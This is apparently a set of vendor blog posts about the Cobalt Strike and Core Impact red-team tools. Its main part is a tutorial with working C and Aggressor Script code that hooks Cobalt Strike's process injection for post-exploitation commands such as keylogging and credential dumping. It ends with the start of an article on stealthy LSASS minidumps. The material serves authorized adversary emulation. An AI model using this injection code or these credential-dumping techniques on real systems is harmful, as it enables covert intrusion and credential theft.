Celebrating 10 Years of Cobalt Strike

 

Can you believe it? Cobalt Strike is 10 years old! Think back to the summer of 2012. The Olympics were taking place in London. CERN announced the discovery of a new particle. The Mars Rover, Curiosity, successfully landed on the red planet. And despite the numerous eschatological claims of the world ending by December, Raphael Mudge diligently worked to create and debut a solution unique to the cybersecurity market.

Raphael designed Cobalt Strike as a big brother to Armitage, his original project that served as a graphical cyber-attack management tool for Metasploit. Cobalt Strike quickly took off as an advanced adversary emulation tool ideal for post-exploitation exercises by Red Teams.

Flash forward to 2022 and not only is the world still turning, Cobalt Strike continues to mature, having become a favorite tool of top cybersecurity experts. The Cobalt Strike team has also grown accordingly, with more members than ever working on research activities to further add features, enhance security, and fulfill customer requests. With version 4.7 nearly ready, we’re eager to show you what we’ve been working on.

However, we’d be remiss not to take a moment to pause and thank the Cobalt Strike user community for all you’ve done to contribute over the years to help this solution evolve. But how could we best show our appreciation? A glitter unicorn card talking about “celebrating the journey”? A flash mob dance to Hall & Oates’ “You Make My Dreams Come True”? Hire a plane to write “With users like you, we’ve Cobalt Struck gold!” It turns out that that it is very difficult to express gratitude in a non-cheesy way, but we’ve tried our best with the following video:


Building Upon a Strong Foundation

 

In the weeks ahead, Cobalt Strike 4.6 will go live and will be a minor foundational release before we move into our new development model. This release will be less about features and is more focused on bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment comes additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customer renewals. The price of Cobalt Strike for new licenses and customers will be $5,900 per user ($3540 when bundled with other offensive security products) for a one-year license.*

The pricing for the Offensive Security – Advanced Bundle of Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

*US Pricing Only

Incorporating New Tools into Core Impact

 

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement. Additionally, these two solutions can be bundled together.

Some modules used by Cobalt Strike that can be now used within Core Impact include:

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the usage of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. Bloodhound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Process Injection Update in Cobalt Strike 4.5

 

Process injection is a core component to Cobalt Strike post exploitation. Until now, the option was to use a built-in injection technique using fork&run. This has been great for stability, but does come at the cost of OPSEC.

Cobalt Strike 4.5 now supports two new Aggressor Script hooks: PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT.  These hooks allow a user to define how the fork&run and explicit injection techniques are implemented when executing post-exploitation commands instead of using the built-in techniques. 

The implementation of these techniques is through a Beacon Object File (BOF) and an Aggressor Script function.  In the next sections a simple example will be provided followed by an example from the Community Kit for each hook. 

These two hooks will cover most of the post exploitation commands, which will be listed in each section.  However, here are some exceptions which will not use these hooks. 

Beacon Command Aggressor Script function 
 &bdllspawn  
execute-assembly &bexecute_assembly 
shell&bshell
Exceptions to the 4.5 process injection updates

Process Injection Spawn (Fork & Run)

The PROCESS_INJECT_SPAWN hook is used to define the fork&run process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The elevaterunasadmin, &belevate, &brunasadmin and [beacon] -> Access -> Elevate commands will only use the PROCESS_INJECT_SPAWN hook when the specified exploit uses one of the listed aggressor script functions in the table, for example &bpowerpick
  1. For the net and &bnet command the ‘domain’ command will not use the hook. 
  1. The “(use a hash)” note means select a credential that references a hash. 
Beacon Command Aggressor Script function UI Interface 
chromedump   
dcsync &bdcsync  
elevate &belevate [beacon] -> Access -> Elevate 
  [beacon] -> Access -> Golden Ticket 
hashdump &bhashdump [beacon] -> Access -> Dump Hashes 
keylogger &bkeylogger  
logonpasswords &blogonpasswords [beacon] -> Access -> Run Mimikatz 
  [beacon] -> Access -> Make Token (use a hash) 
mimikatz &bmimikatz   
 &bmimikatz_small  
net &bnet [beacon] -> Explore -> Net View 
portscan &bportscan [beacon] -> Explore -> Port Scan 
powerpick &bpowerpick   
printscreen &bprintscreen  
pth &bpassthehash   
runasadmin &brunasadmin  
  [target] -> Scan 
screenshot &bscreenshot [beacon] -> Explore -> Screenshot 
screenwatch &bscreenwatch  
ssh &bssh [target] -> Jump -> ssh 
ssh-key &bssh_key [target] -> Jump -> ssh-key 
  [target] -> Jump -> [exploit] (use a hash) 
Commands that support the PROCESS_INJECT_SPAWN hook in 4.5

Arguments 

The PROCESS_INJECT_SPAWN hook accepts the following arguments 

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 true/false ignore process token 
  • $4 x86/x64 – memory injectable DLL architecture 

Returns 

The PROCESS_INJECT_SPAWN hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own fork&run injection technique. 

I Want to Use My Own spawn (fork & run) Injection Technique.

To implement your own fork&run injection technique you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_SPAWN hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_SPAWN hook to bypass the built-in default.  First, we will create a BOF with our fork&run implementation. 

File: inject_spawn.c

#include <windows.h>
#include "beacon.h"

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   STARTUPINFOA        si;
   PROCESS_INFORMATION pi;
   datap               parser;
   short               ignoreToken;
   char *              dllPtr;
   int                 dllLen;

   /* Warn about crossing to another architecture. */
   if (!is_x64() && x86 == FALSE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x86 -> x64");
   }
   if (is_x64() && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x64 -> x86");
   }

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   ignoreToken = BeaconDataShort(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* zero out these data structures */
   __stosb((void *)&si, 0, sizeof(STARTUPINFO));
   __stosb((void *)&pi, 0, sizeof(PROCESS_INFORMATION));

   /* setup the other values in our startup info structure */
   si.dwFlags = STARTF_USESHOWWINDOW;
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);

   /* Ready to go: spawn, inject and cleanup */
   if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
      return;
   }
   BeaconInjectTemporaryProcess(&pi, dllPtr, dllLen, 0, NULL, 0);
   BeaconCleanupProcess(&pi);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}


Explanation

  • Line 14 starts the code for the go function. This function is called via the gox86 or gox64 functions which are defined at line 53-59.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 15-20 define the variables that are referenced in the function. 
  • Lines 22-28 will check to see if runtime environment matches the x86 flag and print a warning message back to the beacon console and continue. 
  • Lines 30-33 will extract the two arguments ignoreToken and dll from the args parameter. 
  • Lines 35-42 initializes the STARTUPINFO and PARAMETER_INFO variables. 
  • Lines 44-50 implements the fork&run technique using Beacon’s internal APIs defined in beacon.h.  This is essentially the same built-in technique of spawning a temporary process, injecting the dll into the process and cleaning up. 

Compile

Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_spawn.x64.o -c inject_spawn.c 

i686-w64-mingw32-gcc -o inject_spawn.x86.o -c inject_spawn.c 

Create Aggressor Script

File: inject_spawn.cna

# Hook to allow the user to define how the fork and run process injection
# technique is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll (position-independent code)
# $3 = true/false ignore process token
# $4 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_SPAWN {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_spawn. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "sb", $3, $2);

   btask($1, "Process Inject using fork and run.");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $4";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}

Explanation

  • Lines 1-6 is the header information about the function and arguments. 
  • Lines 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 8 defines the variables used in the function. 
  • Line 10-11 sets the architecture for the beacon’s session. 
  • Lines 14-17 reads the inject_spawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 19-20 packs the arguments that the BOF is expecting.  In this example we are passing $3 (ignore process token) as a short and $2 (dll) as binary data. 
  • Lines 22 reports the task to Beacon. 
  • Line 25 sets up which function name to call in the BOF which is either gox86 or gox64 which is based on the dll’s architecture.  Note the beacon’s architecture and dll’s architecture do not have to match.  For example, if your Beacon is running in an x86 context on an x64 OS then some post exploitation jobs such as mimikatz will use the x64 version of the mimikatz dll. 
  • Line 26 uses the beacon_inline_execute function to execute the BOF. 
  • Line 29 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the updated HOOK

Next, load the inject_spawn.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

PROCESS_INJECT_SPAWN

Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_SPAWN hook works let’s try something from the Community Kit. The example which will be used is from the BOFs project https://github.com/ajpc500/BOFs.  For the fork&run implementation use the example under the StaticSyscallsAPCSpawn folder. This uses the spawn with syscalls shellcode injection (NtMapViewOfSection -> NtQueueApcThread) technique.

Steps: 

  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsAPCSpawn directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsapcspawn.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that are different than the simple example. 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The argument that this BOF expects is the dll.  The ignoreToken is not used. 
  3. Calls a function named SpawnProcess, which will use the Beacon API function BeaconSpawnTemporaryProcess.  In this case the x86 parameter is hard coded to FALSE and the ignoreToken is hard coded to TRUE. 
  4. Calls a function named InjectShellcode, which implements their injection technique instead of using the function BeaconInjectTemporaryProcess. 
  5. Finally call the Beacon API function BeaconCleanupProcess. 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_SPAWN function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_SPAWN function which can be put into a new file or add it to the existing static_syscalls_apc_spawn.cna file. 

File: static_syscalls_apc_spawn.cna 

    # Hook to allow the user to define how the fork and run process injection 
    # technique is implemented when executing post exploitation commands. 
    # $1 = Beacon ID 
    # $2 = memory injectable dll (position-independent code) 
    # $3 = true/false ignore process token 
    # $4 = x86/x64 - memory injectable DLL arch 
    set PROCESS_INJECT_SPAWN { 
    
    local('$barch, $handle $data $args'); 
    
        # figure out the arch of this session 
        $barch  = barch($1); 
        
        if ($barch eq "x86") { 
            warn("Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500) does not support x86. Use built in default"); 
            return $null; 
        } 
        
        # read in the right BOF 
        warn("read the BOF: syscallsapcspawn. $+ $barch $+ .o"); 
        $handle = openf(script_resource("syscallsapcspawn. $+ $barch $+ .o")); 
        $data = readb($handle, -1); 
        closef($handle); 
        
        # pack our arguments needed for the BOF 
        $args = bof_pack($1, "b", $2); 
        
        btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)"); 
        
        beacon_inline_execute($1, $data, "go", $args); 
        
        # Let the caller know the hook was implemented. 
        return 1; 
    } 

Explanation

  • Lines 1-6 is the header information about the function and arguments. 
  • Lines 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 9 defines the variables used in the function. In this example we do not need the $entry variable as the entry point will just be “go” 
  • Line 12 will set the $barch to the beacon’s architecture. 
  • Line 14-17 is added in this example because this project is only supporting x64 architecture injection.  When an x86 architecture is detected then return $null to use the built-in technique. 
  • Line 19-23 will read the syscallsapcspawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because Beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 25-26 packs the arguments that the BOF is expecting.  In this example we are passing $2 (dll) as a binary data.  Recall the ignore Token flag was hard coded to TRUE. 
  • Line 28 uses the beacon_inline_execute function to execute the BOF.  In this case just call “go” since the requirement of knowing if it is x86 or x64 is not needed as the x86 flag is hard coded to FALSE. 
  • Line 33 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

Explicit Process Injection (Put Down That Fork)

The PROCESS_INJECT_EXPLICIT hook is used to define the explicit process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The [Process Browser] interface is accessed by [beacon] -> Explore -> Process List.  There is also a multi version of this interface which is accessed by selecting multiple beacon sessions and using the same UI menu.  When in the Process Browser use the buttons to perform additional commands on the selected process. 
  1. The chromedumpdcsynchashdumpkeyloggerlogonpasswordsmimikatznetportscanprintscreenpthscreenshotscreenwatchssh, and ssh-key commands also have a fork&run version.  To use the explicit version requires the pid and architecture arguments. 
  1. For the net and &bnet command the ‘domain’ command will not use the hook. 
Beacon Command Aggressor Script function  UI Interface 
browserpivot &bbrowserpivot [beacon] -> Explore -> Browser Pivot 
chromedump   
dcsync &bdcsync  
dllinject &bdllinject  
hashdump &bhashdump  
inject &binject [Process Browser] -> Inject 
keylogger &bkeylogger [Process Browser] -> Log Keystrokes 
logonpasswords &blogonpasswords  
mimikatz &bmimikatz  
 &bmimikatz_small  
net &bnet  
portscan &bportscan  
printscreen   
psinject &bpsinject  
pth &bpassthehash  
screenshot  [Process Browser] -> Screenshot (Yes) 
screenwatch  [Process Browser] -> Screenshot (No) 
shinject &bshinject  
ssh &bssh  
ssh-key &bssh_key  
Commands that support the PROCESS_INJECT_EXPLICIT hook in 4.5

Arguments 

The PROCESS_INJECT_EXPLICIT hook accepts the following arguments 

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 = the PID to inject into 
  • $4 = offset to jump to 
  • $5 = x86/x64 – memory injectable DLL arch 

Returns 

The PROCESS_INJECT_EXPLICIT hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own explicit injection technique. 

I Want to Use My Own Explicit Injection Technique.

To implement your own explicit injection technique, you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_EXPLICIT hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_EXPLICIT hook to bypass the built-in default.  First, we will create a BOF with our explicit injection implementation. 

File: inject_explicit.c

#include <windows.h>
#include "beacon.h"

/* Windows API calls */
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$IsWow64Process (HANDLE hProcess, PBOOL Wow64Process);
DECLSPEC_IMPORT WINBASEAPI HANDLE  WINAPI KERNEL32$GetCurrentProcess (VOID);
DECLSPEC_IMPORT WINBASEAPI HANDLE  WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
DECLSPEC_IMPORT WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError (VOID);
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* is this a 64-bit or 32-bit process? */
BOOL is_wow64(HANDLE process) {
   BOOL bIsWow64 = FALSE;

   if (!KERNEL32$IsWow64Process(process, &bIsWow64)) {
      return FALSE;
   }
   return bIsWow64;
}

/* check if a process is x64 or not */
BOOL is_x64_process(HANDLE process) {
   if (is_x64() || is_wow64(KERNEL32$GetCurrentProcess())) {
      return !is_wow64(process);
   }

   return FALSE;
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   HANDLE              hProcess;
   datap               parser;
   int                 pid;
   int                 offset;
   char *              dllPtr;
   int                 dllLen;

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   pid = BeaconDataInt(&parser);
   offset = BeaconDataInt(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* Open a handle to the process, for injection. */
   hProcess = KERNEL32$OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
   if (hProcess == INVALID_HANDLE_VALUE || hProcess == 0) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to open process %d : %d", pid, KERNEL32$GetLastError());
      return;
   }

   /* Check that we can inject the content into the process. */
   if (!is_x64_process(hProcess) && x86 == FALSE ) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x86 process (can't inject x64 content)", pid);
      return;
   }
   if (is_x64_process(hProcess) && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x64 process (can't inject x86 content)", pid);
      return;
   }

   /* inject into the process */
   BeaconInjectProcess(hProcess, pid, dllPtr, dllLen, offset, NULL, 0);

   /* Clean up */
   KERNEL32$CloseHandle(hProcess);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}

Explanation

  • Lines 1-2 are the include files, where beacon.h can be downloaded from https://github.com/Cobalt-Strike/bof_template
  • Lines 4-9 define the prototypes for the Dynamic Function Resolution for a BOF. 
  • Lines 11-18 define a function to determine the compiled architecture type. 
  • Lines 20-37 define functions to determine the architecture of the process to inject into. 
  • Line 40 starts the code for the go function. This function is called via the gox86 or gox64 functions which are defined at line 78-84.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 41-46 define the variables that are referenced in the function. 
  • Lines 48-52 will extract the three arguments pid, offset and dll from the args parameter. 
  • Lines 55-59 will open the process for the specified pid. 
  • Lines 61-69 will verify if the content can be injected into the process. 
  • Line 72 implements the explicit injection technique using Beacon’s internal APIs defined in beacon.h.  This is the same built-in technique for injecting into a process. 
  • Lines 75 will close the handle to the process. 

Compile

Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_explicit.x64.o -c inject_explicit.c 

i686-w64-mingw32-gcc -o inject_explicit.x86.o -c inject_explicit.c 

Create Aggressor Script

Next, create the Aggressor Script PROCESS_INJECT_EXPLICIT hook function. 

File: inject_explicit.cna

# Hook to allow the user to define how the explicit injection technique
# is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll for the post exploitation command
# $3 = the PID to inject into
# $4 = offset to jump to
# $5 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_EXPLICIT {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_explicit. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "iib", $3, $4, $2);

   btask($1, "Process Inject using explicit injection into pid $3");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $5";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}

Explanation

  • Lines 1-7 contains the header information about the function and arguments. 
  • Lines 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 15-18 reads the inject_explicit.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 21 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, $4 (offset) as an integer, and $2 (dll) as binary data. 
  • Lines 23 reports the task to Beacon. 
  • Line 26 sets up which function name to call in the BOF which is either gox86 or gox64 which is based on the dll’s architecture.  Note the Beacon’s architecture and dll’s architecture do not have to match. 
  • Line 27 uses the beacon_inline_execute function to execute the BOF. 
  • Line 30 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_explicit.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF

PROCESS_INJECT_EXPLICIT

Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_EXPLICIT hook works let’s try something from the Community Kit. The example which will be used is from the BOFs project https://github.com/ajpc500/BOFs.  For the explicit injection implementation we will select a different technique from this repository. Use the example under the StaticSyscallsInject folder. 

Steps: 

  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsInject directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsinject.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided

Items to note in the entry.c file that are different than the simple example. 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The arguments that this BOF expects are the pid and dll.  The offset is not used. 
  3. Calls a function named InjectShellcode, which implements their injection technique instead. 
  4. Opens the Process 
  5. Allocates Memory and Copies it to the Process 
  6. Create the thread and wait for completion 
  7. Cleanup 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_EXPLICIT function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_EXPLICIT function which can be put into a new file or add it to the existing static_syscalls_inject.cna file. 

File: static_syscalls_inject.cna

# Hook to allow the user to define how the explicit injection technique 
# is implemented when executing post exploitation commands. 
# $1 = Beacon ID 
# $2 = memory injectable dll for the post exploitation command 
# $3 = the PID to inject into 
# $4 = offset to jump to 
# $5 = x86/x64 - memory injectable DLL arch 
set PROCESS_INJECT_EXPLICIT { 
local('$barch $handle $data $args'); 

# Set the architecture for the beacon's session 
$barch = barch($1); 

if ($barch eq "x86") { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support x86. Use built in default"); 
    return $null; 
} 

if ($4 > 0) { 
    warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support offset argument. Use built in default"); 
    return $null; 
} 

# read in the injection BOF based on barch 
warn("read the BOF: syscallsinject. $+ $barch $+ .o"); 
$handle = openf(script_resource("syscallsinject. $+ $barch $+ .o")); 
$data = readb($handle, -1); 
closef($handle); 

# pack our arguments needed for the BOF 
$args = bof_pack($1, "ib", $3, $2); 

btask($1, "Static Syscalls Shellcode Injection BOF (@ajpc500) into pid $3"); 

beacon_inline_execute($1, $data, "go", $args); 

# Let the caller know the hook was implemented. 
return 1; 
} 

Explanation

  • Lines 1-7 contains the header information about the function and arguments. 
  • Lines 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Line 14-17 is added in this example because this project is only supporting x64 architecture injection.  When an x86 architecture is detected then return $null to use the built-in technique. 
  • Line 19-22 is added in this example because this project is not supporting the offset to jump to argument.  When this is detected then return $null to use the built-in technique. 
  • Lines 25-28 reads the syscallsinject.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 31 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, and $2 (dll) as binary data. 
  • Lines 33 reports the task to Beacon. 
  • Line 35 uses the beacon_inline_execute function to execute the BOF. 
  • Line 38 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Next, load the Aggressor Script file into the Cobalt Strike client through the Colbalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF

References

Nanodump: A Red Team Approach to Minidumps

 

Motivation

It is known that dumping Windows credentials is a technique often utilized for everyday attacks by adversaries and, consequently, Red Teamers. This process has been out there for several years and is well documented by MITRE under the T1003.001 technique. Sometimes, when conducting a Red Team engagement, there may be some limitations when trying to go beyond the early detection of this technique to allow defenders to train complex manipulation and usage of the credentials.  

One of the options to overcome this limitation is to explicitly allow the execution of this technique. However, there is another way, which is both stealthier and more lightweight. The following article will dive into how it can be executed. 

Introduction 

ReactOS, is an interesting and valuable project for anyone interested in understanding the low-level code of a Windows-like OS. We found that starting with the less-resistant path and trying to compile minidump.c from ReactOS to be quite difficult. However, after carefully analyzing the minidump module from skelsec, we found information about the minidump file format. 

The minidump format is quite complex and has many structures, pointers, and sections. In order to keep things as simple as possible, we experimented with the minidump python module to remove and change several parts in order to understand if these were relevant. 

Streams 

A minidump is composed of multiple “streams” which are like sections that contain specific information. For example, ExceptionStream presumably contains information like the stack trace in case the minidump was created due to a crash. 

After testing with pypykatz we found that the only relevant streams were SystemInfoStream, ModuleListStream, and Memory64ListStream. This first finding simplified the process because limiting the number of streams reduced the processing that needed to be done. 

SystemInfoStream 

This stream has information about the Windows machine, and it is not related to LSASS itself. It has relevant information such as the Windows version and build number, but also less relevant fields such as the number of processors. 

We ended up setting all the fields that were not needed to NULL. This made the process of creating the minidump a lot simpler, as we were able to ignore irrelevant fields. 

ModuleListStream 

All of the DLLs LSASS loaded are listed in this stream. It is worth noting that, while this stream is important, for this exercise, it wasn’t necessary to include every single DLL.  

